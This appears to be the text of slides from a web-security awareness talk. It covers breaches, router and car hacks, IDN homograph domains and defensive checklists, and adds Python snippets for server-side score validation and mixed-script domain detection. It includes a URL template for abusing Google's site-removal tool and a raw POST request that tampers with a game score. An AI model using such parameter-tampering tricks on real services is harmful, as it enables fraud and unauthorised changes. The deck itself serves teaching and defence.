  • 77. Access Control: Removing any site from Google using URL manipulation? • Exploit in Google Webmaster Tools • Fixed within 7 hours https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=http://{YOUR_URL}/&urlt={URL_TO_BLOCK} Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
  • 78. The Action Part 1. Invest in hardware 2. Backup and Recovery Plans 3. Prevent flooding 4. Use Access Control Lists 5. Secure configuration, Logging and Monitoring
  • 79. Google is not Google? (2012, Brazil) • Biggest ISP in Brazil • Firmware vulnerability • 4.5 million routers • Malicious DNS servers • Fake Google.com, Facebook.com, Yahoo.com and others install malware
  • 80. The Action Part 6. Minimum open ports and running services
  • 81. There is no escape sometimes!
  • 82. Most Vulnerable Products 2017 (Source: Vulnerability Review 2017, Flexera Software)
  • 83. (chart) Known vulnerabilities per year by OS in the last 10 years, 2005 to 2015: Windows, MacOS, Ubuntu (incl. kernel), Debian (incl. kernel)
  • 84.
  • 85. The Action Part 6. Minimum open ports and running services 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update
  • 87.
  • 88. Example 2: Baby-Phone • IoT can be dangerous • Wi-Fi sniffing is possible • Strangers near your house?
  • 90. The Action Part 6. Minimum open ports and running services, use firewall 7. Frequent update of firmware and software 8. Secure updates – use checksums to avoid downloading fake update 9. Improve physical security
  • 91.
  • 93. A Story of How I Won an Online Game
  • 94. Non-Encrypted POST query:
    When I finished the game, the following HTTP POST query was sent:
    POST /path/script.cgi HTTP/1.0
    From: game@*site*.com
    User-Agent: HTTPTool/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 33
    name=Peter&surname=Sabev&score=10
    My “next game” was with the following POST query:
    POST /path/script.cgi HTTP/1.0
    From: game@*site*.com
    User-Agent: HTTPTool/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    name=Peter&surname=Sabev&score=32767
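Added example (not the presenter's code): a small Python server-side handler for the POST above. It parses the raw request as shown on the slide and then compares the client-supplied score with the server's own tally, which is the only figure the server should trust. The game-session class, its point limit and the player's session are constructed for the demo.

```python
from urllib.parse import parse_qs

# Constructed copies of the two requests on the slide (CRLF line endings).
HONEST_REQUEST = (
    "POST /path/script.cgi HTTP/1.0\r\n"
    "From: game@*site*.com\r\n"
    "User-Agent: HTTPTool/1.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "\r\n"
    "name=Peter&surname=Sabev&score=10"
)
TAMPERED_REQUEST = (HONEST_REQUEST
                    .replace("Content-Length: 33", "Content-Length: 36")
                    .replace("score=10", "score=32767"))


def parse_post(raw: str) -> dict:
    """Split a raw HTTP/1.0 POST into its form fields (first value of each)."""
    head, _, body = raw.partition("\r\n\r\n")
    _request_line, *header_lines = head.split("\r\n")
    headers = dict(line.split(": ", 1) for line in header_lines)
    length = int(headers.get("Content-Length", len(body)))
    return {k: v[0] for k, v in parse_qs(body[:length]).items()}


class GameSession:
    """Server-side record of the game; the client never writes to it directly."""

    MAX_POINTS_PER_EVENT = 5   # constructed game rule

    def __init__(self, player: str):
        self.player = player
        self.points = 0

    def record_event(self, points: int) -> None:
        # Game rules are enforced here, where the client cannot edit them.
        if not 0 < points <= self.MAX_POINTS_PER_EVENT:
            raise ValueError("impossible event")
        self.points += points


def submit_score(raw_request: str, session: GameSession) -> dict:
    """Accept the submission only if it matches what the server itself recorded."""
    form = parse_post(raw_request)
    claimed = int(form.get("score", "-1"))
    if form.get("name") != session.player:
        return {"accepted": False, "reason": "player mismatch"}
    if claimed != session.points:
        # The POST body is just bytes the client chose to send. Keep the
        # server's figure and flag the submission instead of storing 32767.
        return {"accepted": False, "reason": "score mismatch",
                "claimed": claimed, "server_score": session.points}
    return {"accepted": True, "server_score": session.points}


if __name__ == "__main__":
    game = GameSession("Peter")
    game.record_event(5)
    game.record_event(5)
    print(submit_score(HONEST_REQUEST, game))
    print(submit_score(TAMPERED_REQUEST, game))
```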
  • 95.
  • 98. Jeep Cherokee remotely controlled • Uconnect radio breach • Anyone can control your car • Just need to know car’s IP address • Chrysler recalls 1 400 000 vehicles
  • 99. Plane hacked mid-air (05’2015) • Just using laptop and LAN cable • Entertainment System connected to the Cabin Control System • Default credentials • Caused plane to climb in simulated flight
  • 101. The Action Part: Use recommended, accepted and up to date implementation and follow the best encryption and authentication practices.
  • 102. Compare left and right… Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
  • 103. The letters in red are Cyrillic (IDN attack) Facebook.com Google.com Yahoo.com Booking.com Facebook.com Google.com Yahoo.com Booking.com
  • 104. The Action Part: Obtain EV certificate & use 2FA. Issue was resolved for browsers in April 2017, still a problem for emails and links in social networks.
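Added example (mine, not from the deck): a Python check that flags a hostname whose label mixes scripts, the pattern in the two slides above, and shows the ASCII (xn--) form the resolver actually uses. The lookalike hostname is constructed with a Cyrillic а (U+0430) in place of the Latin one.

```python
import unicodedata

LOOKALIKE = "f\u0430cebook.com"   # constructed: second letter is CYRILLIC SMALL LETTER A
GENUINE = "facebook.com"


def scripts_in(label: str) -> set:
    """Scripts used by the letters of one DNS label, taken from the Unicode names."""
    scripts = set()
    for ch in label:
        name = unicodedata.name(ch, "")
        if not name or name.startswith("DIGIT") or ch == "-":
            continue                                  # digits and hyphens are neutral
        scripts.add(name.split(" ", 1)[0])            # e.g. LATIN, CYRILLIC, GREEK
    return scripts


def is_mixed_script(hostname: str) -> bool:
    """True when any label mixes two scripts, the classic IDN homograph pattern."""
    return any(len(scripts_in(label)) > 1 for label in hostname.split("."))


def to_ascii_form(hostname: str) -> str:
    """The xn-- (punycode) form that DNS resolves; a browser can display this
    instead of the lookalike so that the two names no longer look identical."""
    return hostname.encode("idna").decode("ascii")


def classify(hostname: str) -> str:
    """One-line verdict for a link target, e.g. from an e-mail or social post."""
    if is_mixed_script(hostname):
        return f"suspicious: mixed scripts, resolves as {to_ascii_form(hostname)}"
    return f"ok: {to_ascii_form(hostname)}"


if __name__ == "__main__":
    for host in (GENUINE, LOOKALIKE):
        print(host, "->", classify(host))
```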
  • 105.
  • 106. London HIV Clinic • Sent emails with addresses using “To:” instead of “Bcc:” • 730 of the 781 patients contained people's full names • Fined £180,000
  • 107. App needs access? • Pictures? Videos? Files? • Calls info? Device ID? • Wi-Fi networks? (image of a football schedule app: Friday 17 June, 15.00 Italy - Sweden, 18.00 Czech Republic - Croatia, 21.00 Spain - Turkey)
  • 108. (image: 5.1 km)
  • 111. (images: 10.9 km, 5.1 km, 9.9 km) … and probably many more!
  • 112.
  • 113. The Ashley Madison Data Breach • 9.7 GB user data stolen • Search engine “Is he cheating on you?” • 32 000 000 user accounts compromised • Punishment in Saudi Arabia is death (about 1200 Saudi Arabian accounts leaked) • 2 people committed suicide • $567 000 000 lawsuit
  • 114. The Action Part
    1. Collect minimum personal information (fight Marketing if needed)
    2. Ensure all collected personal data is properly protected+encrypted (when stored and in transit)
    3. Ensure only authorized individuals have access to personal information (incl. internally)
    4. Be extra careful with logs, error messages, testing with real data, using it with 3rd parties, etc.
  • 115. Will my company be hacked? Yes, eventually! “It happened before, it will happen again… It is just a question of when.” -- Armageddon Movie
  • 116. Create Responsible Disclosure Policy “Please email security@mycompany.com to report any security vulnerabilities” Organize bug bounty! See hackerone.com and bugcrowd.com Choose white hats!
  • 117. The Black Hat and White Hat Book
  • 120. Links
    www.owasp.org Free Open Source Security Community
    www.sans.org SANS Institute, Certifications
    https://cve.mitre.org/ Common Vulnerabilities and Exposures (CVE)
    https://www.wired.com/category/security/ News and Updates
  • 121. To avoid comedy and drama… The Action Part: Summary
    1. Don’t trust user input and always sanitize it
    2. Careful with passwords, use 2FA
    3. Keep your software updated and secure
    4. Encrypt and store securely.
    5. Be careful with sensitive data

Editor's notes

  1. Radon is a tasteless, colourless and odourless radioactive gas.